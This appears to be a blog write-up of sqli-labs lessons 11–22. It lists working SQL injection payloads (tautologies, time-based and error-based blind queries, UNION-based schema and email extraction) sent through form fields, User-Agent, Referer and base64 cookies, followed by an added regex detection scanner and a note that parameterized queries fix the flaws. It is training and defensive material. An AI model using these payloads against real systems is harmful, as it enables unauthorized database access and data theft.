sqli-labs less11-15


less11

uname=1' or 1=1 # &passwd=x

less12

uname=1") or 1=1 # &passwd=x

less13

username:1'
Password: (anything)
Error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '12') LIMIT 0,1' at line 1
From the ') in the error message we can tell that the program wraps id in ').

uname=1') or 1=1 # &passwd=x

less14

uname=admin"and left(database(),1)>'a'#&passwd=1&submit=Submit

less15 (POST, time-based blind injection)

uname=admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#&passwd=11&submit=Submit

Less-16

uname=") or 1=1#&passwd=x

uname=") or if(length(database())=8,1,sleep(2))#&passwd=x

less17

Username:admin
Password:1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin'' at line 1
We can see admin'', which shows that '' is used when the password is processed.
Next, use blind injection.
Here we first demonstrate error-based blind injection.
uname=admin&passwd=1' and extractvalue(1,concat(0x7e,(select @@version),0x7e))#

Less-18 Header Injection- Error Based- string
Append the payload after the User-Agent in the header:
' or updatexml(1,concat(0x5e,(select database() ),0x5e),1),",")#
' or updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x5e),1),",")#
' or updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_name="emails" limit 1,1),0x5e),1),",")#
' or updatexml(1,concat(0x5e,(select email_id from emails limit 0,1),0x5e),1),",")#

Less-19 Header Injection- Referer- Error Based- string
Append the payload after the Referer in the header:
' or updatexml(1,concat(0x5e,(select database() ),0x5e),1),",")#
' or updatexml(1,concat(0x5e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x5e),1),",")#
' or updatexml(1,concat(0x5e,(select column_name from information_schema.columns where table_name="emails" limit 0,1),0x5e),1),",")#
' or updatexml(1,concat(0x5e,(select email_id from emails limit 0,1),0x5e),1),",")#

Less-20 Cookie Injection- Error Based- string
Attach the payload to the Cookie in the header:
uname=admin' order by 3#
uname=x' union select 1,database(),3#
uname=x' union select 1,group_concat(0x5e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x5e),3 #
uname=x' union select 1,group_concat(0x5e,(select column_name from information_schema.columns where table_name="emails" limit 1,1),0x5e),3 #
uname=x' union select 1,group_concat(0x5e,(select email_id from emails limit 0,1),0x5e),3 #

Less-21 Cookie Injection- Error Based- complex - string
Here the Cookie just needs to be set to the base64-encoded form of the following payloads:
uname=admin') order by 3#
uname=x') union select 1,database(),3#
uname=x') union select 1,group_concat(0x5e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x5e),3 #
uname=x') union select 1,group_concat(0x5e,(select column_name from information_schema.columns where table_name="emails" limit 1,1),0x5e),3 #
uname=x') union select 1,group_concat(0x5e,(select email_id from emails limit 0,1),0x5e),3 #

Less-22 Cookie Injection- Error Based- Double Quotes - string
Here the Cookie just needs to be set to the base64-encoded form of the following payloads:
uname=admin" order by 3#
uname=x" union select 1,database(),3#
uname=x" union select 1,group_concat(0x5e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x5e),3 #
uname=x" union select 1,group_concat(0x5e,(select column_name from information_schema.columns where table_name="emails" limit 1,1),0x5e),3 #
uname=x" union select 1,group_concat(0x5e,(select email_id from emails limit 0,1),0x5e),3 #
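
A defensive counterpart to the lessons above, as an added example that is not part of the original post or of sqli-labs: a heuristic scanner that checks POST fields, the User-Agent and Referer headers and cookie values, including base64-encoded cookies as in Less-21 and Less-22, for the SQL constructs used on this page. The field names, rule names and sample requests are constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import unquote, unquote_plus

# Heuristic rules for the constructs used in this page's payloads (not exhaustive).
SQLI_PATTERNS = {
    "error_based": re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I),
    "time_based": re.compile(r"\bsleep\s*\(", re.I),
    "union_select": re.compile(r"\bunion\s+select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\b", re.I),
    "tautology": re.compile(r"['\"]\s*\)?\s*or\s+1\s*=\s*1", re.I),
    "order_by_probe": re.compile(r"['\"]\s*\)?\s*order\s+by\s+\d+", re.I),
}

def candidate_decodings(value):
    """Return the raw and URL-decoded forms, plus base64 decodings where valid."""
    texts = {value, unquote(value), unquote_plus(value)}
    for text in list(texts):
        try:
            texts.add(base64.b64decode(text, validate=True).decode("utf-8"))
        except (binascii.Error, UnicodeDecodeError, ValueError):
            pass  # not base64, or not text once decoded
    return texts

def scan_request(fields):
    """fields maps a location label to its raw value; returns sorted (location, rule) hits."""
    hits = set()
    for location, value in fields.items():
        for text in candidate_decodings(value):
            for rule, pattern in SQLI_PATTERNS.items():
                if pattern.search(text):
                    hits.add((location, rule))
    return sorted(hits)

# Constructed sample requests (not captured traffic); the strings come from this page.
SAMPLES = [
    {"body.uname": "admin", "body.passwd": "x", "header.User-Agent": "Mozilla/5.0"},
    {"body.uname": "1' or 1=1 #", "body.passwd": "x"},
    {"body.uname": "admin'and If(ascii(substr(database(),1,1))=115,1,sleep(5))#"},
    {"header.Referer": "' or updatexml(1,concat(0x5e,(select database() ),0x5e),1)#"},
    {"cookie.uname": base64.b64encode(b"x') union select 1,database(),3#").decode()},
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(scan_request(sample))
```

Pattern matching like this is for detection and log triage; the fix for every lesson on this page is a parameterized query, applied to headers and cookies as well as form fields.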



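Author: Mang0

Published: 2018-04-02, 16:15:38

Last updated: 2018-10-15, 08:40:51

Original link: http://mang0.me/archis/ced895c1/

Copyright notice: "Attribution-NonCommercial-ShareAlike 4.0". Please keep the original link and author when reposting.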
